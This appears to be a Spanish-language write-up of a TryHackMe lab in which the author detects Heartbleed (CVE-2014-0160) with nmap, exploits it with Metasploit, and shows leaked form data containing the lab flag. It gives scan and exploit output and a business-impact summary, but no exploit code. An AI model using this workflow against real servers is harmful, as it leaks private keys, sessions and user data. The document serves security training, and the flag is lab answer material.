
El objetivo de este proyecto fue evaluar un host remoto en busca de la vulnerabilidad Heartbleed (CVE-2014-0160), verificar su presencia y explotarla para extraer información potencialmente sensible de la memoria del servidor a través del protocolo TLS.
Objetivo El objetivo de este proyecto era evaluar un host remoto para la vulnerabilidad Heartbleed (CVE-2014-0160), verificar su presencia y explotarla para extraer información potencialmente sensible de la memoria del servidor a través del protocolo TLS.
Ejecución
plaintext PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 111/tcp open rpcbind 2-4 443/tcp open ssl/http nginx 1.15.7
| ssl-cert: Subject: CN=localhost/O=TryHackMe/ST=London/C=UK | Not valid before: 2019-02-16T10:41:14 | Not valid after: 2020-02-16T10:41:14 El certificado TLS era autofirmado y había expirado. Esto generó sospechas de que la versión de OpenSSL podría estar desactualizada. Puerto objetivo: 443.
plaintext | ssl-heartbleed: | VULNERABLE: | OpenSSL 1.0.1 is vulnerable to Heartbleed | State: VULNERABLE | Risk factor: High | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 Se confirma que el objetivo es vulnerable a Heartbleed.
plaintext [+] Heartbeat response with leak, 44883 bytes [+] Heartbeat data stored in /root/.msf4/loot/20250627224930_default_52.215.184.158_openssl.heartble_152689.bin Memoria volcada con éxito y almacenada localmente para análisis.
plaintext user_name=hacker101&user_email=[email protected]&user_message=THM{sSl-Is-BaD} Se extrajo con éxito datos confidenciales, incluido un indicador de aplicación, de la memoria TLS, lo que confirma que la vulnerabilidad puede ser explotada prácticamente para filtrar información sensible.
Conclusión Identifiqué y exploté con éxito CVE-2014-0160 en un servidor remoto. El proceso incluyó:
Detectar la vulnerabilidad con nmap
Explotar la falla usando Metasploit
Extraer datos en vivo enviados por el usuario (incluido el indicador THM{sSl-Is-BaD}) de la memoria
Impacto empresarial La presencia de Heartbleed en un sistema expuesto públicamente representa un riesgo crítico:
Posible filtración de claves privadas TLS
Secuestro de sesión
Exposición de nombres de usuario, correos electrónicos y entrada de usuario sensible